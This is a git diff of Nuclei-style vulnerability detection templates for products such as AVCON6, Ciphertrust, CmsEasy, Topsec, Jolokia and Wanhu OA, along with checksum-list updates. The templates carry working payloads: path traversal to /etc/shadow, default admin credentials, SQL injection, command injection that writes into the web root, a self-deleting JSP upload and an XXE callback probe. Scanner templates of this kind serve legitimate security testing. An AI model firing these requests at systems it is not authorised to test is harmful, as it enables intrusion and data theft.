- metadata: - fofa-query: title="AVCON6" - tags: fileread - -http: - - raw: - - | - GET /org_execl_download.action?filename=../../../../../../../../../../../../../etc/shadow HTTP/1.1 - Host: {{Hostname}} - - - - matchers: - - type: dsl - dsl: - - 'status_code_1 == 200 && contains(body_1,"root:*:0")' - condition: and diff --git a/http/vulnerabilities/other/ciphertrust-default-password-vulnerability.yaml b/http/vulnerabilities/other/ciphertrust-default-password-vulnerability.yaml deleted file mode 100755 index dc945fce2f..0000000000 --- a/http/vulnerabilities/other/ciphertrust-default-password-vulnerability.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: ciphertrust-default-password-vulnerability - -info: - name: Ciphertrust default password vulnerability - author: SleepingBag945 - severity: medium - description: | - Attackers can control the entire platform through the default password (initpass) vulnerability, and use administrator privileges to operate core functions.<br> - metadata: - fofa-query: cert="Ciphertrust" || fid="yHV5+ZZGMu0=" - tags: default Password - -http: - - raw: - - | - POST /api/v1/auth/tokens/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"username":"admin","connection":"local_account","password":"admin","grant_type":"password","refresh_token_revoke_unused_in":30,"cookies":true,"labels":["web-ui"]} - - - matchers: - - type: dsl - dsl: - - 'status_code_1 == 401 && contains(body_1,"code") && contains(body_1,"Password change required")' - condition: and diff --git a/http/vulnerabilities/other/cloud-oa-system-sqli.yaml b/http/vulnerabilities/other/cloud-oa-system-sqli.yaml index 2fec8a765a..be74d958c2 100644 --- a/http/vulnerabilities/other/cloud-oa-system-sqli.yaml +++ b/http/vulnerabilities/other/cloud-oa-system-sqli.yaml @@ -1,42 +1,52 @@ id: cloud-oa-system-sqli info: - name: Cloud OA system SQLi + name: Cloud OA System - SQL Injection author: SleepingBag945 severity: high - description: cloud OA system /OA/PM/svc.asmx page parameters are not properly filtered, resulting in a SQL injection vulnerability, which can be used to obtain sensitive information in the database. - tags: cloudoa,sqli + description: | + cloud OA system /OA/PM/svc.asmx page parameters are not properly filtered, resulting in a SQL injection vulnerability, which can be used to obtain sensitive information in the database. + reference: + - https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/xray_pocs/yaml-poc-eqccd-eqccd_oa-sql_injection-CT-456760.yml#L8 + metadata: + max-request: 1 + verified: true + fofa-query: body="全程云办公" && body="/OA/WebResource.axd" + tags: cloud,cloudoa,sqli + +variables: + num: "999999999" http: - raw: - | POST /OA/PM/svc.asmx HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: text/xml - Accept-Encoding: gzip, deflate <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetUsersInfo xmlns="http://tempuri.org/"> - <userIdList>LOWER(CONVERT(VARCHAR(32),HashBytes('MD5','{{randstr}}'),2))</userIdList> + <userIdList>LOWER(CONVERT(VARCHAR(32),HashBytes('MD5','{{num}}'),2))</userIdList> </GetUsersInfo> </soap:Body> </soap:Envelope> - - matchers-condition: and matchers: - type: word + part: body words: - "System.Data.SqlClient.SqlException" - - "<?xml version=" - - "{{md5('{{randstr}}')}}" + - "{{md5(num)}}" condition: and + - type: word + part: header + words: + - text/xml + - type: status status: - - 500 - + - 500 \ No newline at end of file diff --git a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml index 0876cc8349..e955c86bdb 100755 --- a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml +++ b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml @@ -1,33 +1,32 @@ -id: cmseasy-crossall-act-sqli +id: cmseasy-crossall-sqli info: - name: CmsEasy crossall_act.php SQL injection vulnerability + name: CmsEasy crossall_act - SQL Injection author: SleepingBag945 severity: high description: | - CmsEasy 存在SQL注入漏洞,通过文件 service.php 加密SQL语句执行即可执行任意SQL命令 + CmsEasy crossall_act.php SQL Injection Vulnerability. CmsEasy has a SQL injection vulnerability. Any SQL command can be executed by encrypting the SQL statement in the file service.php. + reference: + - https://cn-sec.com/archives/1580677.html + - https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json#L28 metadata: + max-request: 1 + verified: true fofa-query: app="CmsEasy" - tags: sqli + tags: cmseasy,sqli http: - - raw: - - | - GET /?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0 - - + - method: GET + path: + - "{{BaseURL}}/?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK" matchers-condition: and matchers: - type: word + part: body words: - '{"123":"123"}' - part: body - type: status status: - - 200 - -# https://www.zilyun.com/44962.html \ No newline at end of file + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/other/h2console-unauth.yaml b/http/vulnerabilities/other/h2console-unauth.yaml index 65f81a302c..e69de29bb2 100755 --- a/http/vulnerabilities/other/h2console-unauth.yaml +++ b/http/vulnerabilities/other/h2console-unauth.yaml @@ -1,29 +0,0 @@ -id: h2console-unauth - -info: - name: H2 Console Web Login Panel - unauth - author: SleepingBag945 - severity: medium - description: H2 Console Web login panel was detected. - reference: - - https://blog.csdn.net/weixin_45366453/article/details/125525496 - - https://blog.csdn.net/zy15667076526/article/details/111413979 - metadata: - shodan-query: http.title:"H2 Console" - tags: unauth,h2,console - -http: - - method: GET - path: - - '{{BaseURL}}/h2-console/login.jsp' - - matchers: - - - type: dsl - dsl: - - "status_code == 200" - - "contains(body, 'Welcome to H2')" - - "contains(body, 'H2 Console')" - condition: and - -# Enhanced by md on 2022/11/16 diff --git a/http/vulnerabilities/other/kingdee-apusic-directory-traversal.yaml b/http/vulnerabilities/other/kingdee-apusic-directory-traversal.yaml index bb3ab9da2a..e69de29bb2 100755 --- a/http/vulnerabilities/other/kingdee-apusic-directory-traversal.yaml +++ b/http/vulnerabilities/other/kingdee-apusic-directory-traversal.yaml @@ -1,41 +0,0 @@ -id: kingdee-apusic-directory-traversal - -info: - name: Kingdee Apusic - Local File Inclusion - author: SleepingBag945 - severity: medium - description: Kingdee Apusic server_file is vulnerable to local file inclusion and can allow attackers to obtain sensitive server information. - reference: - - http://wiki.peiqi.tech/wiki/oa/%E9%87%91%E8%9D%B6OA/%E9%87%91%E8%9D%B6OA%20Apusic%E5%BA%94%E7%94%A8%E6%9C%8D%E5%8A%A1%E5%99%A8-%E4%B8%AD%E9%97%B4%E4%BB%B6%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: kingdee,lfi,traversal - -http: - - method: GET - path: - - "{{BaseURL}}/admin/protected/selector/server_file/files?folder=C://&suffix=" - - "{{BaseURL}}/admin/protected/selector/server_file/files?folder=/&suffix=" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"name":"Windows","path":"C:\\\\Windows","folder":true}' - - '{"name":"root","path":"/root","folder":true}' - condition: or - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/03 diff --git a/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml b/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml index 136040c349..627e7c65d2 100755 --- a/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml +++ b/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml @@ -1,26 +1,32 @@ id: shiziyu-cms-apicontroller-sqli info: - name: shiziyu-cms-apicontroller-sqli + name: Shiziyu CMS Api Controller - SQL Injection author: SleepingBag945 severity: high description: | - 狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 + Shiziyu CMS ApiController.class.php parameter filtering is not rigorous, resulting in SQL injection vulnerability. metadata: + max-request: 1 + verified: true fofa-query: body="/seller.php?s=/Public/login" tags: sqli +variables: + num: "999999999" + http: - - raw: - - | - GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1) HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0 - - + - method: GET + path: + - "{{BaseURL}}/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{num}}),0x7e),1)" + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 404 && contains(body_1,"c4ca4238a0b923820dcc509a6f75849") && contains(body_1,"syntax error")' - condition: and + - type: word + part: body + words: + - 'c8c605999f3d8352d7bb792cf3fdb25' + + - type: status + status: + - 404 \ No newline at end of file diff --git a/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml b/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml index e22fd1bbd4..ecee0fa0eb 100755 --- a/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml +++ b/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml @@ -1,14 +1,16 @@ id: jolokia-logback-jndi-rce info: - name: jolokia-logback-jndi-rce + name: Jolokia Logback JNDI - Remote Code Execution author: SleepingBag945 severity: high reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - https://github.com/LandGrey/SpringBootVulExploit#0x04jolokia-logback-jndi-rce - tags: jolokia,springboot,tomcat + metadata: + max-request: 2 + tags: jolokia,springboot,tomcat,rce http: - method: GET @@ -19,15 +21,13 @@ http: stop-at-first-match: true matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - 'ch.qos.logback.classic.jmx.JMXConfigurator' - - type: word - part: body - words: - - 'reloadByURL' \ No newline at end of file + - 'reloadByURL' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/topsec/topsec-topacm-rce.yaml b/http/vulnerabilities/topsec/topsec-topacm-rce.yaml index 1de5d07dfc..b9effa9761 100755 --- a/http/vulnerabilities/topsec/topsec-topacm-rce.yaml +++ b/http/vulnerabilities/topsec/topsec-topacm-rce.yaml @@ -1,13 +1,18 @@ id: topsec-topacm-rce info: - name: topsec topacm remote code execution + name: Topsec Topacm - Remote Code Execution author: SleepingBag945 severity: critical - description: 天融信 上网行为管理系统 static_convert.php 远程命令执行漏洞 + description: | + Tianrongxin Internet Behavior Management System static_convert.php remote command execution vulnerability reference: - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/TRXController.java - https://github.com/Phuong39/2022-HW-POC/blob/main/天融信-上网行为管理系统RCE.md + metadata: + max-request: 2 + verified: true + fofa-query: body="ActiveXObject" && body="dkey_login" && body="repeat-x" tags: rce,topsec,topacm http: @@ -15,9 +20,7 @@ http: - | GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27{{randstr}}%27%20%3E%20/var/www/html/config_application.txt%0a HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - raw: - | GET /config_application.txt HTTP/1.1 Host: {{Hostname}} @@ -25,12 +28,16 @@ http: matchers-condition: and matchers: - type: word + part: body_2 words: - "{{randstr}}" + - type: word + part: header_2 + words: + - text/plain + - type: status + part: header_2 status: - - 200 - - -# body="ActiveXObject" && body="dkey_login" && body="repeat-x left top" \ No newline at end of file + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml b/http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml index 611da722eb..4444a41afd 100755 --- a/http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml @@ -1,48 +1,55 @@ -id: wanhu-oa-fileupload-controller-arbitrary-file-upload +id: wanhu-oa-fileupload-controller + info: - name: wanhu-oa-fileupload-controller-arbitrary-file-upload + name: Wanhu OA Fileupload Controller - Arbitrary File Upload author: SleepingBag945 severity: critical - description: 万户OA fileUpload.controller 存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件 + description: | + There is an arbitrary file upload vulnerability in Wanhu OA fileUpload.controller. An attacker can upload any file through the vulnerability. reference: - - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20fileUpload.controller%20任意文件上传漏洞.html - tags: wanhu,oa + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20fileUpload.controller%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md?plain=1#L24 + - https://github.com/tr0uble-mAker/POC-bomber/blob/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/redteam/wanhu_oa_fileupload-controller_fileupload_2022.py#L20 + metadata: + max-request: 2 + verified: true + fofa-query: app="万户网络-ezOFFICE" + tags: wanhu,oa,fileupload,controller + +variables: + num1: "{{rand_int(1000, 9999)}}" + num2: "{{rand_int(1000, 9999)}}" + result: "{{to_number(num1)*to_number(num2)}}" http: - raw: - | POST /defaultroot/upload/fileUpload.controller HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6 --b0d829daa06c13d6b3e16b0ad21d1eed - Content-Disposition: form-data; name="file"; filename="indh.jsp" + Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: application/octet-stream - <%out.print(42285 * 41559);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> + <%out.print({{num1}}*{{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%> --b0d829daa06c13d6b3e16b0ad21d1eed-- - | GET /defaultroot/upload/html/{{filename}} HTTP/1.1 Host: {{Hostname}} - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: filename - internal: true - group: 1 - regex: - - '"data":"(.*?)"' - - req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")' - - 'status_code_2 == 200 && contains(body_2,"1757322315")' + - 'status_code_2 == 200 && contains(body_2,"{{result}}")' condition: and + + extractors: + - type: regex + name: filename + group: 1 + regex: + - '"data":"(.*?)"' + internal: true \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhu-oa-officeserverservlet-arbitrary-file-upload.yaml b/http/vulnerabilities/wanhu/wanhu-oa-officeserverservlet-arbitrary-file-upload.yaml deleted file mode 100755 index 9dcaff9f6b..0000000000 --- a/http/vulnerabilities/wanhu/wanhu-oa-officeserverservlet-arbitrary-file-upload.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: wanhu-oa-officeserverservlet-arbitrary-file-upload -info: - name: wanhu-oa-officeserverservlet-arbitrary-file-upload - author: SleepingBag945 - severity: critical - description: 万户OA officeserverservlet 文件上传漏洞 - reference: - - https://github.com/onMey/WH/blob/main/poc.py - - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20OfficeServer.jsp%20任意文件上传漏洞.html - tags: wanhu,oa - -http: - - raw: - - | - GET /defaultroot/officeserverservlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - matchers-condition: and - matchers: - - type: word - words: - - "DBSTEP V3.0" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/wanhu/wanhu-oa-smartupload-arbitrary-file-upload.yaml b/http/vulnerabilities/wanhu/wanhu-oa-smartupload-arbitrary-file-upload.yaml deleted file mode 100755 index c2f4558c06..0000000000 --- a/http/vulnerabilities/wanhu/wanhu-oa-smartupload-arbitrary-file-upload.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: wanhu-oa-smartupload-arbitrary-file-upload -info: - name: wanhu-oa-smartupload-arbitrary-file-upload - author: SleepingBag945 - severity: critical - description: 万户OA smartUpload.jsp文件存在文件上传接口,且没有对文件类型进行过滤,导致任意文件上传漏洞。可直接上传恶意JSP文件。 - reference: - - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20smartUpload.jsp%20任意文件上传漏洞.html - tags: wanhu,oa - -http: - - raw: - - | - GET /defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - matchers-condition: and - matchers: - - type: word - words: - - "请选择要上传的文件" - - type: word - words: - - "<TITLE>上传附件" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml index 08d101247c..51231848eb 100755 --- a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml +++ b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml @@ -1,11 +1,18 @@ -id: wanhu-oa-teleconferenceservice-xxe-inject +id: wanhu-oa-teleconferenceservice-xxe + info: - name: wanhu-oa-teleconferenceservice-xxe-inject + name: Wanhu OA TeleConferenceService Interface - XXE author: SleepingBag945 - severity: medium - description: 万户OA TeleConferenceService接口存在XXE注入漏洞,攻击者通过漏洞可以继续XXE注入获取服务器敏感信息 + severity: high + description: | + There is an XXE injection vulnerability in the Wanhu OA TeleConferenceService interface. An attacker can use the vulnerability to continue XXE injection to obtain sensitive information on the server. reference: - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20TeleConferenceService%20XXE注入漏洞.html + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20TeleConferenceService%20XXE%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: app="万户网络-ezOFFICE" tags: wanhu,oa,xxe http: @@ -13,16 +20,25 @@ http: - | POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService HTTP/1.1 Host: {{Hostname}} - + ]> &xxe; - matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" + + - type: word + part: header + words: + - "text/xml" + + - type: word + part: body + words: + - "retcode>" \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhuoa-officeserverservlet-file-upload.yaml b/http/vulnerabilities/wanhu/wanhuoa-officeserverservlet-file-upload.yaml new file mode 100755 index 0000000000..680a5342f9 --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhuoa-officeserverservlet-file-upload.yaml @@ -0,0 +1,32 @@ +id: wanhuoa-officeserverservlet-file-upload + +info: + name: Wanhu OA OfficeServerServlet - Arbitrary File Upload + author: SleepingBag945 + severity: critical + description: Wanhu OA officeserverservlet file upload vulnerability + reference: + - https://github.com/onMey/WH/blob/main/poc.py + - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20OfficeServer.jsp%20任意文件上传漏洞.html + metadata: + max-request: 1 + verified: true + fofa-query: app="万户网络-ezOFFICE" + tags: wanhu,oa,officeserver,fileupload + +http: + - method: GET + path: + - "{{BaseURL}}/defaultroot/officeserverservlet" + + matchers-condition: and + matchers: + - type: word + words: + - "DBSTEP V3.0" + - "Post" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhuoa-smartupload-file-upload.yaml b/http/vulnerabilities/wanhu/wanhuoa-smartupload-file-upload.yaml new file mode 100755 index 0000000000..ba499f4f33 --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhuoa-smartupload-file-upload.yaml @@ -0,0 +1,32 @@ +id: wanhuoa-smartupload-file-upload + +info: + name: Wanhu OA smartUpload.jsp - Arbitrary File Upload + author: SleepingBag945 + severity: critical + description: | + Wanhu OA smartUpload.jsp file has a file upload interface and does not filter file types, resulting in arbitrary file upload vulnerabilities. Malicious JSP files can be uploaded directly. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20smartUpload.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md?plain=1#L24 + metadata: + max-request: 1 + verified: true + fofa-query: app="万户网络-ezOFFICE" + tags: wanhu,oa,smartupload,file-upload + +http: + - method: GET + path: + - "{{BaseURL}}/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0" + + matchers-condition: and + matchers: + - type: word + words: + - "请选择要上传的文件" + - "上传附件" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 03d837f891a247f06c8c3f66480c5bf185d547a5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 8 Sep 2023 16:56:58 +0530 Subject: [PATCH 0222/1090] Update burp-collaborator-detect.yaml --- http/technologies/burp-collaborator-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/burp-collaborator-detect.yaml b/http/technologies/burp-collaborator-detect.yaml index e1c9257e10..859d60f7ae 100644 --- a/http/technologies/burp-collaborator-detect.yaml +++ b/http/technologies/burp-collaborator-detect.yaml @@ -1,7 +1,7 @@ id: burp-collaborator-detect info: - name: Burp Collaborator Server Running + name: Burp Collaborator Server - Detect author: lum8rjack severity: info description: | @@ -16,7 +16,7 @@ info: max-request: 1 verified: true shodan-query: "Server: Burp Collaborator" - tags: burp,tech + tags: burp,tech,detect http: - method: GET From c36a419cacd976f177da9a4add1015911522cdcc Mon Sep 17 00:00:00 2001 From: meme-lord Date: Fri, 8 Sep 2023 12:30:28 +0100 Subject: [PATCH 0223/1090] added myprestamodules phpinfo template --- http/cves/2023/CVE-2023-39677.yaml | 35 ++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/cves/2023/CVE-2023-39677.yaml diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml new file mode 100644 index 0000000000..5257c10d3e --- /dev/null +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-39677 +info: + name: PrestaShop MyPrestaModules PHPInfo + author: meme-lord + severity: low + description: PrestaShop modules by MyPrestaModules expose PHPInfo + reference: + - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/ + tags: cve,cve2023,prestashop,phpinfo + +http: + - method: GET + path: + - "{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1" + - "{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "PHP Extension" + - "PHP Version" + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' From 39e849162f07c54f2ae80707f54e1057e1b13c55 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 11:40:51 +0000 Subject: [PATCH 0224/1090] Auto Generated New Template Addition List [Fri Sep 8 11:40:51 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fd0eb11116..6b52439588 100644 --- a/.new-additions +++ b/.new-additions @@ -31,6 +31,7 @@ http/misconfiguration/nacos/nacos-create-user.yaml http/misconfiguration/php-debugbar-exposure.yaml http/osint/gist.yaml http/takeovers/lemlist-takeover.yaml +http/technologies/burp-collaborator-detect.yaml http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml http/technologies/wordpress/plugins/wp-seopress.yaml From 5ab0e26ce93f81a0f36fe2fe47f797ddba4312a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 11:41:01 +0000 Subject: [PATCH 0225/1090] Auto Generated Templates Checksum [Fri Sep 8 11:41:01 UTC 2023] :robot: --- templates-checksum.txt | 407 +++++++++++++++++++++-------------------- 1 file changed, 204 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0f2402042b..e01e7430b2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -620,7 +620,7 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:02e294ce7b26d5732d8fc396fc http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a5c13b905ce766747d75254fb82d122c8bbbe70d http/credential-stuffing/self-hosted/grafana-login-check.yaml:3a3891cc6d5dcf12b812bc128a41388883bccc48 http/credential-stuffing/self-hosted/jira-login-check.yaml:906c5a83678bc47a75c5aa5a32925b70d24b804e -http/cve/2023/CVE-2023-38433.yaml:22e156057279af80f55582b2c635f978284f7b91 +http/cve/2023/CVE-2023-38433.yaml:056c61cbe4efba6f865ba3410d5b0e9d43f88d0e http/cves/2000/CVE-2000-0114.yaml:fcd8e8015db69aaba7323d20ef4834bd34fd4346 http/cves/2001/CVE-2001-0537.yaml:f828a1bb3fb196d8fbc7c6cb30d44af702685156 http/cves/2002/CVE-2002-1131.yaml:12ad891bdc82a3f86d726abb8f60634c7ee66a98 @@ -5500,6 +5500,7 @@ http/technologies/bigbluebutton-detect.yaml:7babfe5c0b3525bbe6baf84260b3a52276d9 http/technologies/bigip-config-utility-detect.yaml:d09427ed818d8a6d42d55433b05f9797e8183d17 http/technologies/bigip-detect.yaml:e732a0e0ccdf89e3a773375a381ccc826355d4d9 http/technologies/burp-api-detect.yaml:32c62bae88baa39831901809a7b99a88e5e4db8a +http/technologies/burp-collaborator-detect.yaml:c63e9a2e7b94dc5cc3cfbaf2902451e3bc8c85a5 http/technologies/carestream-vue-detect.yaml:d38b9ca33b084e3bd3f61b383f95e9214f31ef19 http/technologies/casaos-detection.yaml:0c0daf784b60e261419c485ad3687a4ad68373ef http/technologies/catalog-creator-detect.yaml:c130afb44ab17e923d001c8037fb9bd6ce7bdd5a @@ -5807,218 +5808,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 